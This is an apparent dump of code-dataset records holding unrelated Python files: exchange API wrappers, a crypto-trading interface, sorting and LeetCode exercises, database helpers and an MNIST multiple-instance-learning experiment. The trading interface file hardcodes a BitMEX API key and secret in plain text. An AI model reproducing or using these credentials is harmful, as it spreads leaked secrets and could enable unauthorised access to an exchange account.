Keyword Args:\n asset (str, optional)\n needBtcValuation (str, optional): true or false\n recvWindow (int, optional): The value cannot be greater than 60000\n \"\"\"\n\n return await self.sign_request(\n \"POST\", \"/sapi/v1/asset/get-funding-asset\", kwargs\n )\n\n async def user_asset(self, **kwargs):\n \"\"\"User Asset (USER_DATA)\n\n Get user assets, just for positive data.\n\n Weight(IP): 5\n\n POST /sapi/v3/asset/getUserAsset\n\n https://binance-docs.github.io/apidocs/spot/en/#user-asset-user_data\n\n Keyword Args:\n asset (str, optional): If asset is blank, then query all positive assets user have.\n needBtcValuation (str, optional)\n recvWindow (int, optional): The value cannot be greater than 60000\n \"\"\"\n\n url_path = \"/sapi/v3/asset/getUserAsset\"\n return await self.sign_request(\"POST\", url_path, {**kwargs})\n\n async def api_key_permissions(self, **kwargs):\n \"\"\"Get API Key Permission (USER_DATA)\n\n GET /sapi/v1/account/apiRestrictions\n\n https://binance-docs.github.io/apidocs/spot/en/#get-api-key-permission-user_data\n\n Keyword Args:\n recvWindow (int, optional): The value cannot be greater than 60000\n \"\"\"\n\n return await self.sign_request(\n \"GET\", \"/sapi/v1/account/apiRestrictions\", kwargs\n )\n\n\n","repo_name":"majiayu000/Binance-api","sub_path":"spot/_wallet.py","file_name":"_wallet.py","file_ext":"py","file_size_in_byte":5296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"70454829287","text":"import torch\nimport nvfuser_extension # noqa: F401\n\nt = torch.randn((5, 5), device='cuda')\nexpected = torch.sinh(t)\noutput = torch.ops.myop.sinh_nvfuser(t)\n\nprint(\"Expected:\", expected)\nprint(\"Output:\", output)\n\nassert torch.allclose(output, expected)\nprint(\"They match!\")\n","repo_name":"amd/ZenDNN-pytorch","sub_path":"third_party/nvfuser/examples/sinh_extension/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"}
+{"seq_id":"17015327321","text":"from maxlib import *\nfrom binancelib import *\nfrom bitmex import *\nimport pymongo\nfrom mongo_order import *\nfrom pymongo import MongoClient\nimport urllib \nimport logging\nfrom Websocket.util.api_key import generate_nonce, generate_signature\nfrom Websocket import bitmex_websocket\nimport logging\nfrom time import sleep\nimport threading\nbitmex_api_key = 'CjyHN90eGN8Iby8Cnl6kaSJZ'\nbitmex_api_secret = 'GGcRPuh_BJvwXJmxFar9fFE5BcfzGBvxBzwyunmQMBkWKzl6'\nclass Interface():\n\tdef __init__(self):\n\t\tself.Max = MaxLib(\"\",\n\t\t\t\t\"\")\n\t\t#self.Max = MaxLib(\"\",\n\t\t#\t\t\"\")\n\t\t#self.Max = MaxLib(\"\",\n\t\t#\t\t\"\")\n\t\tself.bitmex = Bitmex('CjyHN90eGN8Iby8Cnl6kaSJZ','GGcRPuh_BJvwXJmxFar9fFE5BcfzGBvxBzwyunmQMBkWKzl6')\n\t\tself.Bin = BinanceLib(\"\",\n\t\t\t\t\"\")\n\t\tself.mongo = MongoOrder('trade','place_order')\n\tdef Order_info(self, exchange, market):\n\t\tif(exchange == \"bin\"):\n\t\t\treturn self.Bin.Order_process(market)\n\t\telif(exchange == \"max\"):\n\t\t\treturn self.Max.Order_process(market)\n\tdef Post_orders(self, exchange, market, side, volume, price, types,userID):\n\t\tneworder = {'userID':userID,'exchange':exchange,'market':market,'orderside':side,'ordertype':types,'price':price,'volume':volume,'statue':0}\n\t\tif(exchange == \"bin\"):\n\t\t\torder = self.Bin.Post_orders(market, side, str(volume), str(price), types)\n\t\telif(exchange == \"max\"):\t\t\n\t\t\torder = self.Max.Post_orders(market, side, volume, price, types)\n\t\telif(exchange == 'bitmex'):\n\t\t\torder = self.bitmex.Post_orders(market ,side,float(volume), price, types)\n\t\tneworder['orderID'] = order['orderID']\n\t\tself.mongo.AddOrder(neworder)\n\tdef ClearAll(self, exchange, market):#???\n\t\tif(exchange == \"bin\"):\n\t\t\treturn self.Bin.Clear_all(market)\n\t\telif(exchange == \"max\"):\n\t\t\treturn self.Max.Orders_clear(market)\n\t\telif(exchange == \"bitmex\"):\n\t\t\treturn self.bitmex.DeleteAllOrder(market)\n\tdef DeleteOrdersByOid(self, exchange, market, idnumber):\n\t\tresult = []\n\t\tif(exchange == \"bin\"):\n\t\t\tfor i in idnumber:\n\t\t\t\tresult.append(self.Bin.Delete_orders(market,i[\"id\"]))\n\t\telif(exchange == \"max\"):\n\t\t\tfor i in idnumber:\n\t\t\t\tresult.append(self.Max.Delete_orders(i[\"id\"]))\n\t\telif(exchange == 'bitmex'):\n\t\t\tmyquery = []\n\t\t\tfor id in idnumber:\n\t\t\t\tresult.append(self.bitmex.DeleteOrder(id))\n\t\t\t\tmyquery.append(id)\n\t\tprint (myquery)\n\t\tfor id in myquery:\n\t\t\tself.mongo.DeleteByOid(id)\n\t\treturn result\n\tdef GetOrders(self, exchange, market):\n\t\tif(exchange == \"bin\"):\n\t\t\treturn self.Bin.Get_orders(market)\n\t\telif(exchange == \"max\"):\n\t\t\treturn self.Max.Trades_my(market, \"100\")\n\t\telif(exchange == \"bitmex\"):\n\t\t\treturn self.bitmex.GetOrder(market)\n\tdef GetOrder(self, exchange, ids):\n\t\tif(exchange == \"max\"):\n\t\t\treturn self.Max.Get_order(ids)\n\t\telif(exchange == \"bitmex\"):\n\t\t\tresult = []\n\t\t\torders = self.bitmex.GetOrder()[0]\n\t\t\tfor order in orders:\n\t\t\t\tif(order['orderid'] in ids):\n\t\t\t\t\tresult.append(order)\n\t\t\treturn result\n\tdef Account(self, exchange):\n\t\tif(exchange == \"bin\"):\n\t\t\treturn self.Bin.Account()\n\t\tif(exchange == \"max\"):\n\t\t\treturn self.Max.Account()\nclass MyThread(threading.Thread):\n\tdef __init__(self,key,secret,symbol,userID):\n\t\tthreading.Thread.__init__(self)\t\t\n\t\tself.ws = bitmex_websocket.BitMEXWebsocket(endpoint=\"https://testnet.bitmex.com/api/v1\", symbol = 
symbol,api_key = key, api_secret = secret)\n\t\tself.interface = Interface()\t\n\t\tself.symbol = symbol\n\t\tself.userid = userID\n\t\tself.mongo = MongoOrder('trade','place_order')\n\tdef run(self):\n\t\twhile(self.ws.ws.sock.connected):\n\t\t\tinfors = self.ws.GetOrder()\n\t\t\tself.ChangeOrderStatus(infors)\n\t\t\tsleep(10)\t\t\n\tdef ChangeOrderStatus(self, infors):\n\t\torders = self.interface.GetOrders('bitmex',self.symbol)[0]\n\t\tids = []\n\t\tfor infor in infors:\n\t\t\tids.append(infor['orderID'])\n\t\tfor order in orders:\n\t\t\tprint ('!')\n\t\t\tprint (order)\n\t\t\tif(order['orderid'] not in ids):\n\t\t\t\tself.mongo.UpdateStatusById(order['orderid'])\ntest = MyThread(bitmex_api_key,bitmex_api_secret,'XBTUSD','1')\ntest.start()\ninte = Interface()\n#inte.ClearAll('bitmex','2')\n#inte.GetOrderStatus('XBTUSD','1')\n#exchange, market, side, volume, price, types, marketnameindex = None\ninte.Post_orders('bitmex','XBTUSD','Buy',5,4002,'limit','1')\n#inte.Post_orders('bitmex','XBTUSD','Buy',5,234,'limit')\n#inte.Post_orders('bitmex','ETHUSD','Buy',5,155,'limit')\n#exchange, market, idnumber\n#print (inte.Get_orders('bitmex',''))\n#inte.DeleteOrdersByOid('bitmex','ETHUSD',['29b030cd-d57d-068f-f2c0-357d2f9a6b7b'])\n\n#inte.Clear_all('bitmex','')\n","repo_name":"jmike1211/py-cryptoTrade","sub_path":"interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":4366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"6575391551","text":"\nn, m = map(int, input().split())\na = []\nmx = 0\nmn = 1000000\nfor i in range(n):\n x = list(map(int, input().split()))\n tmpmax = max(x)\n mx = max(tmpmax, mx)\n tmpmin = min(x)\n mn = min(tmpmin, mn)\n a.append(x)\nflat = True\n\ntmp = mx-mn\n\nfor i in range(n):\n for j in range(m):\n if(tmp == a[i][j]):\n flat = False\n break\n if(flat == False):\n break\nif(flat):\n print('NOT FOUND')\nelse:\n print(tmp)\n for i in range(n):\n for j in range(m):\n if(tmp == a[i][j]):\n print(\"Vi tri [\" + str(i) + \"][\" + str(j) + \"]\")\n \n ","repo_name":"bakachanbaby/code_ptit","sub_path":"so_may_man_trong_ma_tran.py","file_name":"so_may_man_trong_ma_tran.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"17790472343","text":"# Quick Sort 퀵정렬\n# 비슷한 속도를 자랑하는 병합정렬도 있음\n\n# 원리 : 기준을 설정, 큰수와 작은 수를 교환하고 리스트를 반으로 나누는 방식\n\n'''\n퀵은 Pivot피벗이란 개념을 사용\n= 큰 숫자, 작은 숫자 교환 시의 교환 기준\n\n퀵 정렬 사용 전 피벗을 어떻게 설정할 지 명시 필요\n본 코드는 Hoare Partition 호어 분할 방식을 기준으로 적용\n\n호어 분할 - 리스트에서 첫 번째 데이터를 피벗으로 정함\n1. 왼쪽에서부터 피벗보다 큰 데이터를 선택\n2. 오른쪽에서부터 피벗보다 작은 데이터를 선택\n3. 둘을 교체\n4. 반복\n5. 1과 2에서 찾은 값이 서로 순서가 엇갈리면 작은 데이터와 피벗을 교체\n(ex. 큰=5번, 작=4번)\n6. 피벗을 제외하고 좌, 우를 각각 위 과정 반복\n\n\n보통 재귀로 구현하며, 종료 조건은 리스트 내 원소가 1개인 경우\n'''\narray = [5,7,9,0,3,1,6,2,4,8]\n\ndef quick_sort(array, start, end):\n if start >= end: #원소가 1개\n return\n pivot = start # 호어 분할\n left = start + 1\n right = end\n\n while left <= right:\n #피벗보다 큰 데이터 찾기\n while left <= end and array[left] <= array[pivot]:\n left += 1\n #피벗보다 작은 데이터\n while right > start and array[right] >= array[pivot]:\n right -= 1\n # 엇갈렸다면 교체 (피벗 - 작은데이터)\n if left > right:\n array[right], array[pivot] = array[pivot], array[right]\n else:\n array[left], array[right] = array[right],array[left]\n #분할 이후 왼쪽 + 오른쪽\n quick_sort(array, start, right -1)\n quick_sort(array, right + 1, end)\n\nquick_sort(array, 0, len(array) -1)\nprint(array)","repo_name":"rudgks8092/Book","sub_path":"CodingTest_with_Python/Chapter6_Sort/6-4(Quick).py","file_name":"6-4(Quick).py","file_ext":"py","file_size_in_byte":1802,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"35625096974","text":"import psycopg2\r\nimport os\r\nfrom dotenv import load_dotenv\r\n\r\n \r\ndef create_table() -> str:\r\n load_dotenv(override=True)\r\n connection = psycopg2.connect(os.getenv(\"DATABASE_URL\"))\r\n cur = connection.cursor()\r\n cur.execute(\"\\\r\n CREATE TABLE IF NOT EXISTS autoplius (\\\r\n id serial PRIMARY KEY,\\\r\n manufacturingDate int,\\\r\n engine_l float8,\\\r\n power_kw float8,\\\r\n mileage_km float8,\\\r\n gearbox_auto int,\\\r\n gearbox_manual int,\\\r\n price_euro int\\\r\n );\\\r\n \")\r\n connection.commit()\r\n return \"Table successfully created\"\r\n\r\ndef drop_table() -> str:\r\n\r\n load_dotenv(override=True)\r\n connection = psycopg2.connect(os.getenv(\"DATABASE_URL\"))\r\n cur = connection.cursor()\r\n cur.execute(\"\\\r\n DROP TABLE IF EXISTS autoplius;\\\r\n \")\r\n connection.commit()\r\n return \"Table autoplius was successfully dropped\"\r\n\r\ndef show_table() -> str:\r\n load_dotenv(override=True)\r\n connection = psycopg2.connect(os.getenv(\"DATABASE_URL\"))\r\n cur = connection.cursor()\r\n cur.execute(\"\\\r\n SELECT * from autoplius;\\\r\n \")\r\n return cur.fetchall()\r\n\r\ndef insert_example() -> str:\r\n load_dotenv(override=True)\r\n connection = psycopg2.connect(os.getenv(\"DATABASE_URL\"))\r\n cur = connection.cursor()\r\n cur.execute(\"insert into autoplius(\\\r\n manufacturingDate,\\\r\n engine_l,\\\r\n power_kw, \\\r\n mileage_km, \\\r\n gearbox_auto, \\\r\n gearbox_manual, \\\r\n price_euro) \\\r\n VALUES (2016, 1.5, 70.0, 188928.0, 0, 1, 7550 ) \\\r\n \")\r\n\r\nshow_table()","repo_name":"Folkas/project_24","sub_path":"packages/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"72777061289","text":"def main():\n \"\"\"This program takes in the values of the ACT scores from every state\n and creates a histogram out of them.\"\"\"\n import readscores\n import numpy as np\n import matplotlib.pyplot as plt\n\n data = readscores.read_scored(\"actsat.txt\")\n counter = 0\n act_scores = []\n while counter < len(data):\n act_scores.append(float(data[counter][\"act_average_score\"]))\n counter += 1\n plt.hist(act_scores, bins=7, edgecolor=\"black\", color=\"blue\")\n plt.yticks(np.arange(0, 21, step=5))\n plt.ylabel(\"Number of States\")\n plt.xlabel(\"score out of 36\")\n plt.title(\"Histogram of ACT Scores\")\n plt.show()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"adamponce/python_compiler","sub_path":"lab8/tests/python/scorehist.py","file_name":"scorehist.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"30292314550","text":"from keras.datasets import mnist\n\nimport time\nimport os\nimport numpy as np\nimport random\nimport math\n\nimport tensorflow as tf\n\nconfig = tf.ConfigProto(allow_soft_placement=True)\nsess = tf.Session(config=config)\n\nfrom keras.models import Model\nfrom keras.layers import Input, Lambda, Dense, Conv2D, MaxPool2D, Dropout, GlobalAveragePooling2D, \\\n\tBatchNormalization, Flatten\nfrom keras.utils import to_categorical\n\nfrom keras import backend as K\n\nK.set_image_data_format('channels_first')\nK.set_session(sess)\n\nfrom loss import LossFunction as my_loss\nimport latent\n\nFV_LENGTH = 64\n\nfrom sklearn.cluster import KMeans\n\n\ndef get_model(loss_type, alpha):\n\t\"\"\"Builds simple AlexNet-like architecture\n\n Returns:\n Keras Model with adaptive loss function incorporated\n \"\"\"\n\n\t# Initialize Input parameters\n\tinput_img = Input(shape=(1, 28, 28), name='input_data')\n\tinput_feature = Input(shape=(10,), dtype='float32', name='input_feature')\n\tinput_y = Input(shape=(10,), dtype='float32', name='input_y')\n\n\t# Build simple CNN for digits classification\n\tx = Conv2D(64, (3, 3), activation='relu')(input_img)\n\tx = BatchNormalization()(x)\n\tx = MaxPool2D((2, 2))(x)\n\tx = Conv2D(32, (3, 3), activation='relu')(x)\n\tx = BatchNormalization()(x)\n\tx = MaxPool2D((2, 2))(x)\n\tx = Dropout(rate=0.2)(x)\n\tx = Flatten()(x)\n\tcnn_model = Dense(128, activation='relu')(x)\n\tcnn_model_output = Dense(10, activation='softmax', name='p_out')(cnn_model)\n\n\tloss_function = my_loss(loss_type, alpha, 10)\n\n\t# Use Lambda layer to implement our custom loss function\n\t# todo: implement custom Layer\n\toutput = Lambda(loss_function.loss_main, output_shape=(1,), name='joint_loss')(\n\t\t[input_y, cnn_model_output, input_feature])\n\n\tmibl_model = Model([input_img, input_feature, input_y], output)\n\n\treturn mibl_model\n \n\ndef minibatch_mibl_gen(x, y, batch_size, fmodel, num_instances, num_clusters=100, fraction_class=1.0):\n\t\"\"\"Generator for multiple instance learning framework\n\n Args:\n x, y: image data and labels (ndarray)\n batch_size: number of images per batch (int)\n fmodel: pretrained Keras autoencoder which outputs encoder per image (Keras Model)\n num_instances: number of images per bag (int)\n num_clusters: number of clusters to extract from latent space (int)\n fraction_class: percentage of bag which is reflective of bag label (float between 0 and 1)\n\n Returns:\n Batch containing image, label and estimated label\n \"\"\"\n\n # Get encodings from model\n\tx_latent = x.reshape((len(x), np.prod(x.shape[1:])))\n\tz_mean, z_log = fmodel.predict(x_latent, batch_size=100)\n\n\t# Perform KMeans once at start\n\tkmeans = KMeans(n_clusters=num_clusters, random_state=0).fit(z_mean)\n\tclass_mean = kmeans.cluster_centers_\n\tlabels = kmeans.labels_\n\n\twhile True:\n\n\t\ty_dense = np.argmax(y, axis=1)\n\t\tindices = np.arange(len(y))\n\t\tnp.random.shuffle(indices)\n\n\t\tnum_correct_instances = int(math.ceil(fraction_class * float(num_instances)))\n\t\tnum_random_instances = num_instances - num_correct_instances\n\n\t\tif num_correct_instances == 0:\n\t\t\traise (\"No positive labels in bag! 
We need to have a minimum of 1.\")\n\n\t\t# --------------- Setup MNIST-BAG --------------- \n\t\t# Split dataset so that a certain proportion of labels are in a bag\n\t\tif fraction_class < 1:\n\t\t\tsorted_classes = np.argsort(y_dense)\n\t\t\tif num_random_instances > 0:\n\t\t\t\tindices_toshuffle = np.array([])\n\t\t\t\tfor kdx in range(num_correct_instances, len(y_dense) - num_instances, num_instances):\n\t\t\t\t\tindices_toshuffle = np.concatenate((indices_toshuffle, np.arange(kdx, kdx + num_random_instances)),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\taxis=0)\n\n\t\t\t\tindices_toshuffle = indices_toshuffle.astype('int32')\n\t\t\t\tnp.random.shuffle(indices_toshuffle)\n\n\t\t\t\ti = 0\n\t\t\t\tfor jdx in range(num_correct_instances, len(y_dense) - num_instances, num_instances):\n\t\t\t\t\tsorted_classes[jdx: jdx + num_random_instances] = sorted_classes[\n\t\t\t\t\t\t\tindices_toshuffle[i: min(len(y_dense), i + num_random_instances)]]\n\t\t\t\t\ti = i + num_random_instances\n\n\t\t# Shuffle bags\n\t\tsorted_classes = sorted_classes.reshape(int(len(y_dense) / num_instances), num_instances)\n\t\tnp.random.shuffle(sorted_classes)\n\t\tindices = sorted_classes.flatten()\n\n\t\t# Generate new bag-level labels\n\t\tnew_y = np.zeros((len(y), 1))\n\t\tfor idx in range(0, len(y), num_instances):\n\t\t\t\t# Retrieve label for first image in bag\n\t\t\t\tmax_occ = y_dense[indices[idx]]\n\t\t\t\tnp.random.shuffle(indices[idx:idx + num_instances])\t# shuffle images\n\n\t\t\t\t# Set \"real\" weak label\n\t\t\t\tnew_y[indices[idx: idx + num_instances]] = max_occ\n\n\t\t# Perform majority vote to get estimated class label per cluster\n\t\tnew_labels = np.zeros((num_clusters), dtype='int32')\n\t\tfor a in range(0, num_clusters):\n\t\t\tlst = new_y[np.where(labels == a)[0]].squeeze().astype('int32')\n\t\t\tcounts = np.bincount(lst, minlength=10)\n\t\t\tnew_labels[a] = np.argmax(counts)\n\n\n\t\ty_c = to_categorical(new_y.flatten(), 10)\n\t\tfor start_idx in range(0, len(new_y), batch_size):\n\n\t\t\t# Gather estimated class for current batch\n\t\t\tdist_cat = to_categorical(new_labels[labels[indices[start_idx: start_idx + batch_size]]], 10)\n\n\t\t\tyield [x[indices[start_idx: start_idx + batch_size]], dist_cat,\n\t\t\t\t\ty_c[indices[start_idx: start_idx + batch_size]]], y_c[indices[start_idx: start_idx + batch_size]]\n\n\ndef train_autoencoder(vae_model, vae_name, num_epochs=500):\n\t\"\"\" Train simple (variational) autoencoder\n\n Args:\n vae_model: \"vae\", \"conv_vae\" or \"ae\" depending on what type of model is to be trained (string)\n vae_name: location and name of model once trained (string)\n num_epochs: number of epochs for training (int)\n\n Returns:\n Trained Keras Model\n \"\"\"\n\tprint(vae_model.summary())\n\n\tprint(\"Training VAE model...\")\n\tstart_time = time.time()\n\t(x_train, y_train), _ = mnist.load_data()\n\tx_train = x_train[:, np.newaxis, ...] 
/ 255.\n\tx_train = x_train.reshape((len(x_train), np.prod(x_train.shape[1:])))\n\n\tvae_model.fit(x_train, x_train, batch_size=batch_size, epochs=num_epochs)\n\tprint(\"completed in {:.3f}s\".format(time.time() - start_time))\n\t\n\tprint(\"Trained variational autoencoder.\")\n\tvae_model.save('./latent_models/mnist_ae_64f_500e.h5')\n\n\treturn vae_model\n\n\ndef run_test_example(x_test, y_test, model):\n\t\"\"\"Simple predict function\n\n Returns:\n Test accuracy rate\n \"\"\"\n\tnew_model = Model(inputs=[model.get_layer('input_data').input],\n\t\t\t\t\t\t\toutputs=[model.get_layer('p_out').output])\n\n\tpredictions = new_model.predict(x_test, batch_size=64)\n\n\ttest_accuracy = float(np.sum(np.argmax(y_test, axis=1) == np.argmax(predictions, axis=1))) / len(y_test)\n\tprint(\"test accuracy: \", test_accuracy)\n\n\treturn test_accuracy\n\n\ndef get_latent_model(encoder_type, batch_size=100, latent_dim=FV_LENGTH):\n\t\"\"\"Calls function in latent.py depending on encoder_type - see train_autoencoder(...)\n \"\"\"\n\t\n\tif encoder_type == 'vae':\n\t\tvae_model = latent.get_vae_model(batch_size, latent_dim=latent_dim)\n\t\tvae_model.load_weights('./latent_models/mnist_vae_dense.h5')\n\t\tvae_model.outputs = [vae_model.get_layer('z_mean').output]\n\t\tvae_model._make_predict_function()\n\t\tvmodel = vae_model\n\t \n\telif encoder_type == 'conv_vae':\n\t\tdeepvae_model = latent.get_convvae_model()\n\t\tdeepvae_model.load_weights('./latent_models/mnist_vae_conv.h5')\n\t\tdeepvae_model.outputs = [deepvae_model.get_layer('z_mean').output]\n\t\tdeepvae_model._make_predict_function(batch_size, latent_dim=latent_dim)\n\t\tvmodel = deepvae_model\n\t \n\telse:\n\t\tae_model = latent.get_ae_model(batch_size, latent_dim=latent_dim)\n\t\tae_model.load_weights('./latent_models/mnist_ae.h5')\n\t\tae_model.outputs = [ae_model.get_layer('z').output]\n\t\tae_model._make_predict_function()\n\t\tvmodel = ae_model\n\t\n\treturn vmodel\n\t\n\nif __name__ == \"__main__\":\n\n\tbatch_size = 100\n\tloss_type = \"cluster_class\"\n\talpha = 0.5\n\tcluster_type = 'conv_vae'\n\tnum_k_clusters = 100\n\tnum_epochs = 5\n\n\tsearch_num_instances = [5, 25, 50, 100, 200]\n\tsearch_fraction = [0.5]\n\n\tstart_time = time.time()\n\tmibl_model = get_model(loss_type, alpha)\n\n\t# presave weights so that we can set it back to original model after training (see below)\n\told_weights = mibl_model.get_weights()\n\n\t(x_train, y_train), (x_test, y_test) = mnist.load_data()\n\tx_test = x_test[:, np.newaxis, ...] / 255.\n\tx_train = x_train[:, np.newaxis, ...] 
/ 255.\n\ty_train = to_categorical(y_train, 10)\n\ty_test = to_categorical(y_test, 10)\n \n # train latent representation and save into predefined folder\n\tdeepvae_model = latent.get_convvae_model(latent_dim=FV_LENGTH)\n\t#train_autoencoder(deepvae_model, './latent_models/mnist_convvae_64f_500e.h5')\t\t\n\n\t# throw away the decoder part of the network\n\tdeepvae_model.load_weights('./latent_models/mnist_convvae_64f_500e.h5')\n\tdeepvae_model.outputs = [deepvae_model.get_layer('z_mean').output, deepvae_model.get_layer('z_log').output]\n\tdeepvae_model._make_predict_function()\n\n\tprint(\"Training CNN...\")\n\tfor s in search_num_instances:\n\t\tfor f in search_fraction:\n\t\t\t\n\t\t\ttest_accuracy = []\n\n\t\t\t# repeat same experiment 10 times to meaure variability\n\t\t\tfor r in range(10):\n\t\t\t\tni = s\n\t\t\t\tfraction = f\n\n\t\t\t\tmibl_model.compile(loss={'joint_loss': lambda y_true, y_pred: y_pred}, optimizer=\"adam\")\n\n\t\t\t\t# Train - MNIST-BAG prepared in generator\n\t\t\t\tmibl_model.fit_generator(\n\t\t\t\t\tminibatch_mibl_gen(x_train, y_train, batch_size, deepvae_model,\n\t\t\t\t\t\t\t\t\t\t\tni, num_clusters=num_k_clusters, fraction_class=f),\n\t\t\t\t\tsteps_per_epoch=len(y_train) / batch_size,\n\t\t\t\t\tepochs=num_epochs)\n\n\t\t\t\tacc = run_test_example(x_test, y_test, mibl_model)\n\t\t\t\ttest_accuracy.append(acc)\n\t\t\t\tmibl_model.set_weights(old_weights)\n\n\t\t\tprint(\">> n = \" + str(s) + \", a = \" + str(alpha) + \", fraction = \" + str(f))\n\t\t\tprint(\"mean accuracy: {}, std accuracy: {}\".format(np.mean(np.array(test_accuracy)), np.std(np.array(test_accuracy)))) \n\n# mibl_model.save(\"./mnist_model.h5\")\n","repo_name":"shaziaakbar/cluster-mil","sub_path":"mnist-bag.py","file_name":"mnist-bag.py","file_ext":"py","file_size_in_byte":9728,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"}
+{"seq_id":"71888510889","text":"# leetcode 1466. Reorder Routes to Make All Paths Lead to the City Zero\n# https://leetcode.com/problems/reorder-routes-to-make-all-paths-lead-to-the-city-zero/description/\nclass Solution:\n def minReorder(self, n: int, connections: List[List[int]]) -> int:\n roads = set()\n graph = defaultdict(set)\n\n for s, e in connections:\n roads.add((s, e))\n graph[s].add(e)\n graph[e].add(s)\n answer = 0\n q = deque()\n\n q.append((0, -1))\n\n while q:\n node, parent = q.popleft()\n if (parent, node) in roads:\n answer += 1\n\n for child in graph[node]:\n if child == parent:\n continue\n q.append((child, node))\n\n return answer","repo_name":"do0134/solostudy","sub_path":"algorithm/3월/0324/1sol.py","file_name":"1sol.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"73113857447","text":"#!/usr/bin/env python3\nimport argparse\nimport os\nimport pkgutil\nimport re\nimport sys\n\n# Don't make .pyc files\nsys.dont_write_bytecode = True\n\nscripts_dir = os.path.dirname(os.path.realpath(__file__))\nproject_dir = os.path.dirname(scripts_dir)\nbuild_dir = os.path.join(project_dir, \"build\")\n\n# Build our cmake cache\ncmake_cache = {}\n\ndirs = [build_dir]\ntry:\n dirs.extend([os.path.join(build_dir, f) for f in os.listdir(build_dir)])\nexcept FileNotFoundError:\n pass\n\nfor d in dirs:\n if os.path.isfile(os.path.join(d, \"CMakeCache.txt\")):\n with open(os.path.join(project_dir, d, \"CMakeCache.txt\"), \"r\") as f:\n cmake_cache_text = f.readlines()\n break\n\n# If we still didn't find anything\ntry:\n cmake_cache_text\nexcept NameError:\n cmake_cache_text = []\n\n# Go and process our lines in our cmake file\nfor l in cmake_cache_text:\n\n # Remove whitespace at the ends and start\n l = l.strip()\n\n # Remove lines that are comments\n if len(l) > 0 and not l.startswith(\"//\") and not l.startswith(\"#\"):\n # Extract our variable name from our values\n g = re.match(r\"([a-zA-Z_$][a-zA-Z_.$0-9-]*):(\\w+)=(.*)\", l).groups()\n\n # Store our value and split it into a list if it is a list\n cmake_cache[g[0]] = g[2] if \";\" not in g[2].strip(\";\") else g[2].strip(\";\").split(\";\")\n\n# Try to find our source and binary directories\ntry:\n binary_dir = cmake_cache[cmake_cache[\"CMAKE_PROJECT_NAME\"] + \"_BINARY_DIR\"]\nexcept KeyError:\n binary_dir = None\n\ntry:\n source_dir = cmake_cache[cmake_cache[\"CMAKE_PROJECT_NAME\"] + \"_SOURCE_DIR\"]\nexcept:\n source_dir = project_dir\n\nif __name__ == \"__main__\":\n\n # Root parser information\n command = argparse.ArgumentParser(\n description=\"This script is an optional helper script for performing common tasks for working with the NUClear roles system.\"\n )\n subcommands = command.add_subparsers(\n dest=\"command\", help=\"The command to run from the script. 
See each help for more information.\"\n )\n subcommands.required = True\n\n # Look through the various tools to see if we can find one that matches our arguments\n # If we do we don't need to load all the tools and can just trigger this one directly\n # This saves importing things we don't need\n for dirpath, dnames, fnames in os.walk(scripts_dir):\n for f in fnames:\n if f != \"__init__.py\" and f.endswith(\".py\"):\n\n # Check if this is the tool for the job\n components = os.path.relpath(os.path.join(dirpath, f[:-3]), scripts_dir).split(os.sep)\n if sys.argv[1 : len(components) + 1] == components:\n\n # Load the module\n module = pkgutil.find_loader(\".\".join(components)).load_module()\n if hasattr(module, \"register\") and hasattr(module, \"run\"):\n\n # Build up the base subcommands to this point\n subcommand = subcommands\n for c in components[:-1]:\n subcommand = subcommand.add_parser(c).add_subparsers(\n dest=\"{}_command\".format(c),\n help=\"Commands related to working with {} functionality\".format(c),\n )\n\n module.register(subcommand.add_parser(components[-1]))\n module.run(**vars(command.parse_args()))\n\n # We're done, exit\n exit(0)\n\n # If we reach this point, we couldn't find a tool to use.\n # In this case we need to look through all the tools so we can register them all.\n # This will provide a complete help for the function call so the user can try again\n tools = {}\n for importer, modname, ispkg in pkgutil.walk_packages([scripts_dir]):\n # Tools aren't in packages\n if not ispkg:\n\n # Load the modules and check it's a tool\n components = modname.split(\".\")\n try:\n module = pkgutil.find_loader(modname).load_module()\n if hasattr(module, \"register\") and hasattr(module, \"run\"):\n\n subcommand = subcommands\n tool = tools\n for c in components[:-1]:\n if c in tool:\n tool, subcommand = tool[c]\n else:\n subcommand = subcommand.add_parser(c).add_subparsers(\n dest=\"{}_command\".format(c),\n help=\"Commands related to working with {} functionality\".format(c),\n )\n subcommand.required = True\n tool[c] = ({}, subcommand)\n tool = tool[c][0]\n\n module.register(subcommand.add_parser(components[-1]))\n except ModuleNotFoundError as e:\n print(\"Could not load the tool '{}': {}\".format(modname.replace(\".\", \" \"), e))\n except BaseException as e:\n pass\n\n # Given what we know, this will fail here and give the user some help\n command.parse_args()\n","repo_name":"NUbots/NUWebots","sub_path":"scripts/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":5203,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"}
